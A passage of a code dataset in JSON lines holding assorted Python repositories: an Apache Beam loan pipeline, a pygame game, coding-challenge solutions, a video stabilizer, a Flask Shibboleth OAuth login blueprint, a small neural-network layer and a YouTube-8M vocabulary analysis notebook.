n_late_payments) = element\n return n_late_payments >= 3\n\n\np1 = beam.Pipeline()\n\nmed_loan_defaulters = (\n p1\n | beam.io.ReadFromText('loan.txt',\n skip_header_lines=1)\n | beam.Map(split_row)\n # | beam.Map(print)\n | beam.Map(remove_spaces)\n # | beam.Map(print)\n | beam.Filter(filter_medical_loans)\n # | beam.Map(print)\n | beam.Map(add_points_column)\n | beam.Map(late_payments)\n # | beam.Map(print)\n | beam.Map(get_select_elements) # ('CT55975', 1), ('CT55975', 0)\n # | beam.Map(print)\n | beam.GroupByKey() # ('CT55975', [0, 0, 0, 1, 1, 1, 0, 1, 0, 0, 1, 0])\n | beam.ParDo(Counting()) # ('CT55975', 5)\n | beam.Filter(filter_defaulters)\n | beam.Map(print)\n )\n\np1.run()\n","repo_name":"the-data-guy/Apache_Beam-GCP_Dataflow","sub_path":"Garg/Bank_Defaulters/medical_loans.py","file_name":"medical_loans.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27346745826","text":"import pygame\nfrom components import ui\nfrom components.defaults import Screens, GO_TO_MAINMENU, GO_TO_INSTRUCTION, PLAY, PAUSE, MB_YESNO, ICON_INFO, IN_GAME_BGM, MAINMENU_BGM\nimport ctypes\n\npygame.display.init()\npygame.mixer.init()\n\n\ndisp = pygame.display.set_mode(size=(860, 476), flags=pygame.SHOWN)\nclock = pygame.time.Clock()\n\n# Components\nmainMenu = ui.MainMenu()\ninstructionScreen = ui.Instruction()\ncurrentScreen = Screens.MAIN_MENU\ngameplay = ui.Game()\n#\n\npygame.mixer.music.load(MAINMENU_BGM)\npygame.mixer.music.play(fade_ms=350)\nrunning = True\nwhile running:\n if (currentScreen == Screens.MAIN_MENU):\n mainMenu.update(1/20)\n mainMenu.render(disp)\n elif (currentScreen == Screens.INSTRUCTION):\n instructionScreen.update()\n instructionScreen.render(disp)\n elif (currentScreen == Screens.PLAY):\n gameplay.update()\n gameplay.render(disp)\n \n for e in pygame.event.get():\n if (e.type == pygame.QUIT):\n exit(0)\n elif (e.type == GO_TO_INSTRUCTION.type):\n currentScreen = Screens.INSTRUCTION\n elif (e.type == PLAY.type):\n pygame.mixer.music.stop()\n pygame.mixer.music.unload()\n pygame.mixer.music.load(IN_GAME_BGM)\n pygame.mixer.music.play(fade_ms=350)\n currentScreen = Screens.PLAY\n gameplay = ui.Game()\n elif (e.type == 
GO_TO_MAINMENU.type):\n pygame.mixer.music.stop()\n pygame.mixer.music.unload()\n pygame.mixer.music.load(MAINMENU_BGM)\n pygame.mixer.music.play(fade_ms=350)\n instructionScreen = ui.Instruction()\n mainMenu = ui.MainMenu()\n currentScreen = Screens.MAIN_MENU\n elif (e.type == PAUSE.type):\n if (ctypes.windll.user32.MessageBoxW(0, \"Do you want to continue playing?\\nClick 'Yes' to resume.\\nClick 'No' to exit.\", \"Game paused\", MB_YESNO | ICON_INFO) == 7):\n instructionScreen = ui.Instruction()\n gameplay = ui.Game()\n mainMenu = ui.MainMenu()\n currentScreen = Screens.MAIN_MENU\n\n pygame.display.flip()\n clock.tick(120)","repo_name":"nhathuy07/CatchThePrimes_Game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24652043707","text":"from typing import List\n\n\nclass Solution:\n def moveZeroes(self, arr: List[int]) -> None:\n i = 0\n j = 0\n while j < len(arr):\n if arr[j] != 0:\n arr[i],arr[j] = arr[j],arr[i]\n i += 1\n j += 1\n\n\n# [0 1 1 0 2 2 3 3] becomes [1 1 2 2 3 3 0 0] ","repo_name":"sanjeevjayasurya/leetCodeProblems","sub_path":"move_zeroes_to_right.py","file_name":"move_zeroes_to_right.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19892465194","text":"from lib.playsound import playsound\nimport threading\nfrom time import sleep\n\n\nclass SoundGlobal():\n # Shared flag checked before playing any sound effect\n allow_sound = True\n\nclass SoundCaller:\n path : str\n duration : float\n def __init__(self,path):\n self.path = path\n if(SoundGlobal().allow_sound == True):\n self.CreateSoundThread()\n\n # Creates a sound thread for calling a sound effect\n def CreateSoundThread(self):\n path = self.path\n sound_thread = threading.Thread(target=self.SoundThread,args=(path, ))\n sound_thread.start()\n\n # Calls the specified sound\n def SoundThread(self,path):\n self.duration=playsound(f'{path}',False)\n if(self.duration==0):\n print(\"Sound duration is not supported in this system!\")\n\n","repo_name":"Arda-Gokalp-Batmaz-AGB/Tetris2048","sub_path":"SoundCaller.py","file_name":"SoundCaller.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30591138623","text":"# import required libraries\nfrom vidgear.gears.stabilizer import Stabilizer\nimport cv2\n\n# Open a suitable video stream, such as the webcam on the first index (i.e. 
0); here a video file is used instead\nstream = cv2.VideoCapture(r'D:\Pesa\Video\test\U.mp4')\n\nsize = (int(stream.get(3)),int(stream.get(4)))\nresult = cv2.VideoWriter(\"Stabili_vidgear.mp4\", \n cv2.VideoWriter_fourcc(*'MP4V'),\n 30, size)\n\n\n\n\n# initiate stabilizer object with default parameters\nstab = Stabilizer()\n\n# loop over\nwhile True:\n\n # read frames from stream\n (grabbed, frame) = stream.read()\n \n \n\n # check for frame if not grabbed\n if not grabbed:\n break\n\n # send current frame to stabilizer for processing\n stabilized_frame = stab.stabilize(frame)\n \n\n # wait for the stabilizer while it is still initializing\n if stabilized_frame is None:\n continue\n\n # {do something with the stabilized frame here}\n\n # Show output window\n result.write(stabilized_frame)\n cv2.imshow(\"Stabilized Frame\", stabilized_frame)\n\n # check for 'q' key if pressed\n key = cv2.waitKey(1) & 0xFF\n if key == ord(\"q\"):\n break\n\nresult.release()\n# close output window\ncv2.destroyAllWindows()\n\n# clear stabilizer resources\nstab.clean()\n\n# safely close video stream\nstream.release()","repo_name":"AmarinNon/YSC_Project","sub_path":"Pesa/stabilize_vidGear.py","file_name":"stabilize_vidGear.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41624092874","text":"'''\n9. Write a function that takes a list of names and joins them into a single\nstring separated by a newline, for example: [\"Juan\", \"María\", \"Pedro\"]\n-> \"Juan\\nMaría\\nPedro\"\n'''\n\nlista_de_nombres = [\"Juan\", \"María\", \"Pedro\"]\nseparador = \"\\n\"\n\ndef de_lista_a_cadena_con_separador(lista : list, separador : str)-> str:\n '''\n builds a string from a list of names with a separator between them\n takes a list of names and a separator (e.g. \"\\n\" , \"-\" , \" \")\n returns a string\n '''\n cadena = separador.join(lista)\n return cadena\n\nprint(de_lista_a_cadena_con_separador(lista_de_nombres, separador))","repo_name":"HoracioxBarrios/programacion_1_python","sub_path":"7-Ejercicios-Metodos_cadena-GUIA-f/9_Ejercicio_strings_de_lista_a_cadena_con_separador.py","file_name":"9_Ejercicio_strings_de_lista_a_cadena_con_separador.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8971700040","text":"address = [\"becky street\", 7800, \"japan\"]\npins = {\"mark\": 1234, \"joe\": 1111, \"alice\": 4567}\n\nprint(address[0], address[1])\n# print(len(address))\n# print(type(address[1]))\n# print(address[0:2]) slicing is upper bound exclusive\n# print(address[-2])\n\n# address.append(\"usa\")\n# address.remove(\"usa\")\n# print(address)\n# print(dir(address))\n# print(\"Python is fun\"[-3:][-1])\n\n# person = {\"name\": \"jack\", \"surname\": \"smith\", \"age\": \"29\"}\n# person.pop(\"name\")\n# person[\"name\"] = \"hello\"\n# person[\"age\"] = 90\n# print(person)\n\n# keys = [\"a\", \"b\", \"c\"]\n# values = [1, 2, 3]\n# mydict = dict(zip(keys, values))\n# print(mydict)\n\npin = int(input(\"enter your pin\"))\n\ndef find_in_file(f):\n myfile = open(\"sample.txt\")\n fruit = myfile.read()\n myfile.close()\n fruit = fruit.splitlines()\n if f in fruit:\n return \"that fruit is in the list\"\n else:\n return \"no such thing\"\n\n\nif pin in pins.values():\n fruit = input(\"enter fruit\")\n print(find_in_file(fruit))\nelse:\n print(\"incorrect pin\")\n print(\"this can be accessed by only: \")\n for key in 
pins.keys():\n print(key)\n\n\n\n","repo_name":"JYSW380/python3","sub_path":"fundamental/try.py","file_name":"try.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"933350688","text":"import os\n\nfrom PyQt5.uic import loadUiType\nfrom PyQt5.QtWidgets import QDialog, QFileDialog\n\nsave_form = loadUiType(\"./GUI/SaveGui.ui\")[0]\n\nclass SaveDialog(QDialog, save_form):\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n self.setWindowTitle('Look Out Your Windows')\n \n self.save_path = None\n if os.path.exists(\"./LookOutYourWindows_SavePath.txt\"):\n with open(\"./LookOutYourWindows_SavePath.txt\", \"r\") as f:\n self.save_path = f.readline()\n\n if self.save_path: \n self.lineedit_savepath.setText(self.save_path)\n self.chkbox_save.toggle() # Set check box on\n\n self.btn_browse.clicked.connect(self.browse_dir)\n self.btn_ok.clicked.connect(self.ok)\n self.btn_cancel.clicked.connect(self.cancel)\n\n # Browse save directory\n def browse_dir(self):\n save_path = QFileDialog.getExistingDirectory(self, 'Open a Folder', './') # local variable on purpose, not self.save_path,\n self.lineedit_savepath.setText(save_path) # because pressing 'cancel' returns an empty path\n\n # Click OK btn\n def ok(self):\n self.save_path = self.lineedit_savepath.text()\n\n if self.chkbox_save.isChecked():\n if self.save_path:\n with open(\"./LookOutYourWindows_SavePath.txt\", \"w\") as f:\n f.write(self.save_path)\n else:\n if os.path.exists(\"./LookOutYourWindows_SavePath.txt\"):\n os.remove(\"./LookOutYourWindows_SavePath.txt\")\n\n self.accept()\n\n def cancel(self):\n self.close()","repo_name":"LookOutYourWindows/user-interface","sub_path":"components/SaveDialog.py","file_name":"SaveDialog.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31509784448","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the serviceLane function below.\ndef serviceLane(n, cases):\n all_mins = []\n for i in cases:\n least = width[i[0]]\n for j in range(i[0],i[1]+1):\n if least > width[j]:\n least = width[j]\n all_mins.append(least)\n return all_mins\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n nt = input().split()\n\n n = int(nt[0])\n\n t = int(nt[1])\n\n width = list(map(int, input().rstrip().split()))\n\n cases = []\n\n for _ in range(t):\n cases.append(list(map(int, input().rstrip().split())))\n\n result = serviceLane(n, cases)\n\n fptr.write('\\n'.join(map(str, result)))\n fptr.write('\\n')\n\n fptr.close()\n","repo_name":"needl3/HackerrankSolutions","sub_path":"Easy/ServiceLane.py","file_name":"ServiceLane.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2801332355","text":"import Nine_Robot\r\n\r\n'''\nIntroduction by OrangeSun:\r\n\r\n[List]Board: The Chess Board. 
Player record as 1, Robot record as 2\r\n[Function]Game: [Click_Button] → [Game_Function] → [Robot_run] → [Return States]\r\n[Function]GameOver: Clear the Chess Board\r\n[Function]Win: Judge Win or Lose, Return a Boolean and a number 0(null) or 1(Player) or 2(Robot)\r\n'''\r\n\r\nBoard = [0, 0, 0, 0, 0, 0, 0, 0, 0]\r\n\r\n\r\ndef game(player):\r\n\t# if invalid event #\r\n\tif Board[player-1] != 0:\r\n\t\treturn '!!!Error : Invalid Event', -1\r\n\r\n\t# else, change the board #\r\n\tBoard[player-1] = 1\r\n\r\n\t# if win or lose, return #\r\n\twins, win_n = win()\r\n\tif wins:\r\n\t\ted = game_over(win_n)\r\n\t\treturn ed, -1\r\n\r\n\t# Robot run #\r\n\ty = Nine_Robot.robot_main(Board)\r\n\tif Board[y] != 0:\r\n\t\tprint('Robot’s choice is invalid!', y)\r\n\tprint(y)\r\n\tBoard[y] = 2\r\n\t# if win or lose, return #\r\n\twins, win_n = win()\r\n\tif wins:\r\n\t\ted = game_over(win_n)\r\n\t\treturn ed, y+1\r\n\treturn '--- Continue ---', y+1\r\n\r\n\r\n# if game over, this function will run #\r\ndef game_over(n):\r\n\t# Clear the Board\r\n\tfor i in range(9):\r\n\t\tBoard[i] = 0\r\n\r\n\t# Return States\r\n\tif n == 1:\r\n\t\treturn '--- You Win ---'\r\n\telif n == 2:\r\n\t\treturn '--- You Lose ---'\r\n\telif n == 0:\r\n\t\treturn '--- Bad Game ---'\r\n\telse:\r\n\t\treturn '!!! judge error !!!'\r\n\r\n\r\ndef win():\r\n\t# Win or Lose or Continue\r\n\tif (Board[0] == Board[1] == Board[2]) or (Board[0] == Board[3] == Board[6]) or (Board[0] == Board[4] == Board[8]):\r\n\t\tif Board[0] != 0:\r\n\t\t\treturn True, Board[0]\r\n\r\n\tif (Board[6] == Board[4] == Board[2]) or (Board[6] == Board[7] == Board[8]):\r\n\t\tif Board[6] != 0:\r\n\t\t\treturn True, Board[6]\r\n\r\n\tif (Board[5] == Board[4] == Board[3]) or (Board[5] == Board[2] == Board[8]):\r\n\t\tif Board[5] != 0:\r\n\t\t\treturn True, Board[5]\r\n\r\n\tif Board[1] == Board[4] == Board[7]:\r\n\t\tif Board[1] != 0:\r\n\t\t\treturn True, Board[1]\r\n\r\n\tfor i in range(9):\r\n\t\tif Board[i] == 0:\r\n\t\t\treturn False, 0\r\n\treturn True, 0\r\n","repo_name":"OrangeSun/Python-Nine-Chess-AI","sub_path":"Nine_Game.py","file_name":"Nine_Game.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6372888347","text":"from flask import flash, redirect, url_for, jsonify, current_app as app\nfrom flask_security import current_user, login_user, login_required, logout_user, roles_required\nfrom oauthlib.oauth2.rfc6749.errors import InvalidClientIdError, TokenExpiredError\nfrom flask_dance.consumer import OAuth2ConsumerBlueprint, oauth_authorized, oauth_error\nfrom flask_dance.consumer.storage.sqla import SQLAlchemyStorage\nfrom sqlalchemy.orm.exc import NoResultFound\nfrom .models import OAuth, User, Role\nfrom application import auth_db\nfrom application import logger\n\n\nshibboleth = OAuth2ConsumerBlueprint(\n 'shibboleth', __name__,\n client_id=app.config.get('CLIENT_ID'),\n client_secret=app.config.get('CLIENT_SECRET'),\n base_url=app.config.get('BASE_URL'),\n token_url=app.config.get('TOKEN_URL'),\n authorization_url=app.config.get('AUTHORIZATION_URL'),\n authorized_url=app.config.get('AUTHORIZED_URL'),\n scope=app.config.get('SCOPE'),\n storage=SQLAlchemyStorage(OAuth, auth_db.session, user=current_user)\n)\n\n\ndef is_admin(username):\n admins = app.config.get('ADMINS')\n return True if username in admins else False\n\n\n@shibboleth.before_app_first_request\ndef before_first_request():\n # Admin role check/create\n admin_role_query = 
Role.query.filter_by(name='admin')\n try:\n admin_role = admin_role_query.one()\n except NoResultFound:\n admin_role = Role(name='admin', description='Administrator')\n auth_db.session.add(admin_role)\n auth_db.session.commit()\n\n # End user role check/create\n end_user_role_query = Role.query.filter_by(name='end-user')\n try:\n end_user_role = end_user_role_query.one()\n except NoResultFound:\n end_user_role = Role(name='end-user', description='End user')\n auth_db.session.add(end_user_role)\n auth_db.session.commit()\n\n\n# Create/login local user on successful OAuth login\n@oauth_authorized.connect_via(shibboleth)\ndef shibboleth_logged_in(shibboleth, token):\n\n if not token:\n flash('Failed to log in.', category='error')\n return False\n\n resp = shibboleth.session.get('/idp/profile/oidc/userinfo')\n if not resp.ok:\n msg = 'Failed to fetch user info.'\n flash(msg, category='error')\n return False\n\n info = resp.json()\n user_id = info['preferred_username']\n\n # Find this OAuth token in the database, or create it\n query = OAuth.query.filter_by(provider=shibboleth.name, provider_user_id=user_id)\n try:\n oauth = query.one()\n except NoResultFound:\n oauth = OAuth(provider=shibboleth.name, provider_user_id=user_id, token=token)\n\n if oauth.user:\n login_user(oauth.user)\n flash('Successfully signed in.')\n\n else:\n # Create a new local user account for this user\n user = User(email=info['email'],\n uniqname=info['preferred_username'],\n first_name=info['given_name'],\n last_name=info['family_name'],\n active=True)\n # Add end-user role.\n user.roles.append(Role.query.filter_by(name='end-user').one())\n\n # Admin role check\n if is_admin(user_id):\n user.roles.append(Role.query.filter_by(name='admin').one())\n\n auth_db.session.add(user)\n auth_db.session.commit()\n\n # Associate the new local user account with the OAuth token\n oauth.user = user\n # Save and commit our database models\n auth_db.session.add_all([user, oauth])\n auth_db.session.commit()\n # Log in the new local user account\n login_user(user)\n flash('Successfully signed in.')\n\n # Disable Flask-Dance's default behavior for saving the OAuth token\n return False\n\n\n# Login\n@shibboleth.route(\"/login\")\ndef auth():\n return redirect(url_for(\"shibboleth.login\"))\n\n\n# Logout\n@shibboleth.route(\"/logout\", methods=['GET'])\ndef logout():\n\n if not shibboleth.authorized:\n logger.info(\"not logged in\")\n return redirect(url_for('routes_bp.index'))\n\n try:\n resp = shibboleth.session.post(\n app.config.get('REVOKE_URL'),\n params={'token': app.blueprints['shibboleth'].session.token[\"access_token\"]},\n headers={\"Content-Type\": \"application/x-www-form-urlencoded\"}\n )\n if resp.ok:\n del app.blueprints['shibboleth'].token\n auth_db.session.clear()\n logout_user()\n return redirect(url_for('routes_bp.index'))\n\n except TokenExpiredError as e:\n logger.info(\"Token expired\")\n logout_user()\n return redirect(url_for('routes_bp.index'))\n\n\n# Retrieve current user info\n@shibboleth.route(\"/getuser\")\ndef get_user():\n\n if not shibboleth.authorized:\n logger.info(\"not logged in\")\n return redirect(url_for('routes_bp.index'))\n\n return jsonify(first_name=current_user.first_name,\n email=current_user.email,\n authenticated=True,\n admin=is_admin(current_user.uniqname))\n\n\n# notify on OAuth provider error\n@oauth_error.connect_via(shibboleth)\ndef shibboleth_error(shibboleth, message, response):\n msg = 'OAuth error from {name}! 
message={message} response={response}'.format(\n name=shibboleth.name, message=message, response=response\n )\n flash(msg, category='error')\n","repo_name":"GhastlyParadox/Flora-Flask","sub_path":"application/auth/shibboleth.py","file_name":"shibboleth.py","file_ext":"py","file_size_in_byte":5330,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24143176343","text":"from .BaseLayer import BaseLayer\nfrom .Activation import Activation\nfrom simplegrad import Graph\nfrom simplegrad.implementation.primitives.Variable import Variable\nimport numpy as np\n\n\nclass DenseLayer(BaseLayer):\n def __init__(self, num_neurons: int, activation: str | Activation = \"relu\"):\n self._num_neurons = num_neurons\n self._bias = Variable(np.zeros((1, num_neurons)))\n if isinstance(activation, str):\n self._activation = Activation(activation)\n else:\n self._activation = activation\n self._num_neurons = num_neurons\n self._graph = None\n self._shape = None\n self._features = None\n self._weight = None\n\n def setInput(self, input: Graph):\n self._features = input.shape[1]\n assert len(input.shape) == 2, \"Expected input shape to be (n, features)\"\n if self._weight is None:\n self._weight = Variable(\n np.random.random((self._features, self._num_neurons)) * 2 - 1\n )\n\n self._shape = (input.shape[0], self._num_neurons)\n self._graph = input @ self._weight + self._bias\n if self._activation is not None:\n self._graph = self._activation(self._graph)\n\n def getTrainable(self) -> list[Variable]:\n return [self._weight, self._bias]\n\n def getGraph(self) -> Graph:\n assert self._graph is not None, \"Must call setInput() at first\"\n return self._graph\n\n def __call__(self, *args, **kwargs):\n self.setInput(*args, **kwargs)\n return self.getGraph()\n\n @property\n def shape(self):\n return self._shape\n","repo_name":"alexdremov/SimpleGrad","sub_path":"simplegrad/algo/nn/DenseLayer.py","file_name":"DenseLayer.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10146439175","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport csv\nimport networkx as nx\nfrom subprocess import check_output\nfrom wordcloud import WordCloud, STOPWORDS\n\n# In[ ]:\n\n\nvocabulary = pd.read_csv('../input/vocabulary.csv')\nvocabulary.head()\n\n# In[ ]:\n\n\nvocabulary.describe()\n\n# In[ ]:\n\n\nvocabulary.info()\n\n# In[ ]:\n\n\nplt.figure(figsize = (10,8))\nvocabulary.groupby('Vertical1').TrainVideoCount.sum().plot(kind=\"bar\")\nplt.title(\"Average TrainVideoCount per vertical1\")\nplt.show()\n\n# In[ ]:\n\n\nplt.figure(figsize = (10,8))\nvocabulary.groupby('Vertical1').Index.count().plot(kind=\"bar\")\nplt.title(\"Average number video per vertical1\")\nplt.show()\n\n# In[ ]:\n\n\nplt.figure(figsize = (10,8))\nvocabulary.groupby('Vertical2').TrainVideoCount.sum().plot(kind=\"bar\")\nplt.title(\"Average TrainVideoCount per vertical2\")\nplt.show()\n\n# In[ ]:\n\n\nplt.figure(figsize = (10,8))\nvocabulary.groupby('Vertical2').TrainVideoCount.count().plot(kind=\"bar\")\nplt.title(\"Average video number per vertical2\")\nplt.show()\n\n# In[ ]:\n\n\nplt.figure(figsize = (10,8))\nvocabulary.groupby('Vertical3').TrainVideoCount.sum().plot(kind=\"bar\")\nplt.title(\"Average TrainVideoCount per vertical3\")\nplt.show()\n\n# In[ ]:\n\n\nplt.figure(figsize = 
(10,8))\nvocabulary.groupby('Vertical3').TrainVideoCount.count().plot(kind=\"bar\")\nplt.title(\"Average video number per vertical3\")\nplt.show()\n\n# In[ ]:\n\n\nsns.lmplot(x='Index', y='TrainVideoCount', data=vocabulary , size=15)\n\n# In[ ]:\n\n\nplt.figure(figsize = (10,8))\nsns.heatmap(vocabulary.groupby('Vertical1').corr(), annot=True )\nplt.show()\n\n# In[ ]:\n\n\nvocabulary.groupby('Vertical1').corr()\n\n# In[ ]:\n\n\nplt.figure(figsize = (15,15))\n\nstopwords = set(STOPWORDS)\n\nwordcloud = WordCloud(\n background_color='black',\n stopwords=stopwords,\n max_words=1000,\n max_font_size=120, \n random_state=42\n ).generate(str(vocabulary['WikiDescription']))\n\nprint(wordcloud)\nfig = plt.figure(1)\nplt.imshow(wordcloud)\nplt.title(\"WORD CLOUD - description\")\nplt.axis('off')\nplt.show()\n\n# In[ ]:\n\n\nplt.figure(figsize = (15,15))\n\nstopwords = set(STOPWORDS)\n\nwordcloud = WordCloud(\n background_color='black',\n stopwords=stopwords,\n max_words=1000,\n max_font_size=120, \n random_state=42\n ).generate(str(vocabulary['Name']))\n\nprint(wordcloud)\nfig = plt.figure(1)\nplt.imshow(wordcloud)\nplt.title(\"WORD CLOUD - Name\")\nplt.axis('off')\nplt.show()\n\n# In[ ]:\n\n\nplt.figure(figsize = (15,15))\n\nstopwords = set(STOPWORDS)\n\nwordcloud = WordCloud(\n background_color='black',\n stopwords=stopwords,\n max_words=1000,\n max_font_size=120, \n random_state=42\n ).generate(str(vocabulary['Vertical1']))\n\nprint(wordcloud)\nfig = plt.figure(1)\nplt.imshow(wordcloud)\nplt.title(\"WORD CLOUD - Vertical1\")\nplt.axis('off')\nplt.show()\n\n# In[ ]:\n\n\nplt.figure(figsize = (15,15))\n\nstopwords = set(STOPWORDS)\n\nwordcloud = WordCloud(\n background_color='black',\n stopwords=stopwords,\n max_words=1000,\n max_font_size=120, \n random_state=42\n ).generate(str(vocabulary['Vertical2']))\n\nprint(wordcloud)\nfig = plt.figure(1)\nplt.imshow(wordcloud)\nplt.title(\"WORD CLOUD - Vertical2\")\nplt.axis('off')\nplt.show()\n\n# In[ ]:\n\n\nwith open('../input/vocabulary.csv', 'r') as f:\n vocabularylist = list(csv.reader(f))\nT1=[]\nfor l in vocabularylist:\n if l[5] != 'NaN' and l[6] !='NaN' and l[5] != '' and l[6] !='' and l[5] != l[6] :\n c1 = l[5]\n c2 = l[6]\n T1.append((c1, c2))\n if l[5] != 'NaN' and l[7] !='NaN' and l[5] != '' and l[7] !='' and l[5] != l[7] :\n c1 = l[5]\n c2 = l[7]\n T1.append((c1, c2))\n if l[6] != 'NaN' and l[7] !='NaN' and l[6] != '' and l[7] !='' and l[7] != l[6] :\n c1 = l[6]\n c2 = l[7]\n T1.append((c1, c2))\nedges = {k: T1.count(k) for k in set(T1)}\nedges\n \n\n# In[ ]:\n\n\nB = nx.DiGraph()\nnodecolor=[]\nfor ed, weight in edges.items():\n if ed[0]!='Vertical2' and ed[0]!='Vertical3' and ed[1]!='Vertical2' and ed[1]!='Vertical3':\n B.add_edge(ed[0], ed[1], weight=weight)\nfor k in B.nodes:\n if (k == \"Beauty & Fitness\"):\n nodecolor.append('blue')\n elif (k == \"News\"):\n nodecolor.append('Magenta')\n elif (k == \"Food & Drink\"):\n nodecolor.append('crimson')\n elif (k == \"Health\"):\n nodecolor.append('green')\n elif (k == \"Science\"):\n nodecolor.append('yellow')\n elif (k == \"Business & Industrial\"):\n nodecolor.append('cyan')\n elif (k == \"Home & Garden\"):\n nodecolor.append('darkorange')\n elif (k == \"Travel\"):\n nodecolor.append('slategrey')\n elif (k == \"Arts & Entertainment\"):\n nodecolor.append('red')\n elif (k == \"Games\"):\n nodecolor.append('grey')\n elif (k == \"People & Society\"):\n nodecolor.append('lightcoral')\n elif (k == \"Shopping\"):\n nodecolor.append('maroon')\n elif (k ==\"Computers & Electronics\"):\n 
nodecolor.append('orangered')\n elif (k == \"Hobbies & Leisure\"):\n nodecolor.append('saddlebrown')\n elif (k == \"Sports\"):\n nodecolor.append('lawngreen')\n elif (k == \"Real Estate\"):\n nodecolor.append('deeppink')\n elif (k == \"Finance\"):\n nodecolor.append('navy')\n elif (k == \"Reference\"):\n nodecolor.append('royalblue')\n elif (k == \"Autos & Vehicles\"):\n nodecolor.append('turquoise')\n elif (k == \"Internet & Telecom\"):\n nodecolor.append('lime')\n elif (k == \"Law & Government\"):\n nodecolor.append('palegreen')\n elif (k == \"Jobs & Education\"):\n nodecolor.append('springgreen')\n elif (k == \"Pets & Animals\"):\n nodecolor.append('lightpink')\n elif (k == \"Books & Literature\"):\n nodecolor.append('lightpink')\n \n\n# In[ ]:\n\n\nplt.figure(figsize = (15,15))\nnx.draw(B, pos=nx.circular_layout(B), node_size=1500, with_labels=True, node_color=nodecolor)\nnx.draw_networkx_edge_labels(B, pos=nx.circular_layout(B), edge_labels=nx.get_edge_attributes(B, 'weight'))\nplt.title('Weighted graph representing the relationship between the categories', size=20)\nplt.show()\n\n# In[ ]:\n\n\n# analysis\nprint('')\nprint(\"number of nodes : %s\" % B.number_of_nodes())\nprint(\"number of arcs : %s\" % B.number_of_edges())\n\n# incoming edges\nindeg = 0\nfor n in B.in_degree():\n indeg += n[1]\n\n# outgoing edges\noutdeg = 0\nfor n in B.out_degree():\n outdeg += n[1]\n\nprint('')\nprint(\"the number of edges pointing to the node : %s\" % indeg)\nprint(\"the number of edges pointing to the outside of the node : %s\" % outdeg)\n\n# convert to an undirected graph\nG = B.to_undirected()\n\n# min and max degree\nlistmindegre = (0, 10)\nlistmaxdegre = (0, 0)\nfor n in G.degree():\n if (listmindegre[1] > n[1]):\n listmindegre = n\n if (listmaxdegre[1] < n[1]):\n listmaxdegre = n\n\nprint('')\nprint(\"The node that has the minimal degree is : \", listmindegre)\nprint(\"The node that has the maximum degree is : \", listmaxdegre)\nedgdesmax=0\nfor ed,w in G.edges.items():\n if(w['weight']>edgdesmax):\n edgdesmax=w['weight']\n edgdescat=ed\nedgdescat\nprint(\"categories \",edgdescat[0],\" and \",edgdescat[1],\" have the largest relationship weight ( w = \",edgdesmax,\")\")\n \n# centrality\nlistmincentrality = (0, 10)\nlistmaxcentrality = (0, 0)\nfor n in (nx.betweenness_centrality(G)).items():\n if (listmincentrality[1] > n[1]):\n listmincentrality = n\n elif (listmaxcentrality[1] < n[1]):\n listmaxcentrality = n\n\nprint('')\nprint(\"The node that has minimal centrality is : \", listmincentrality)\nprint(\"The node that has the maximum centrality is : \", listmaxcentrality)\n\n# normalized\nlistminnormalized = (0, 10)\nlistmaxnormalized = (0, 0)\nfor n in (nx.degree_centrality(G)).items():\n if (listminnormalized[1] > n[1]):\n listminnormalized = n\n elif (listmaxnormalized[1] < n[1]):\n listmaxnormalized = n\n\nprint('')\nprint(\"The node that has the minimum (normalized) degree is : \", listminnormalized)\nprint(\"The node that has the maximal (normalized) degree is: \", listmaxnormalized)\n\n\n# In[ ]:\n\n\n\n# clique search\nprint('')\ncl = list(nx.find_cliques(G))\nprint(\"number of maximal cliques %s\" % nx.graph_number_of_cliques(G))\nprint(\"size of the largest clique %s\" % nx.graph_clique_number(G))\nprint('')\n\nprint(\"cliques of size 2 or 3: \")\nfor cl in nx.find_cliques(G):\n if len(cl)==2 or len(cl)==3:\n print(cl)\n\n\n# In[ ]:\n\n\n# shortest paths\npathlengths = []\n\nfor v in G.nodes():\n spl = nx.single_source_shortest_path_length(G, v)\n for p in spl.values():\n 
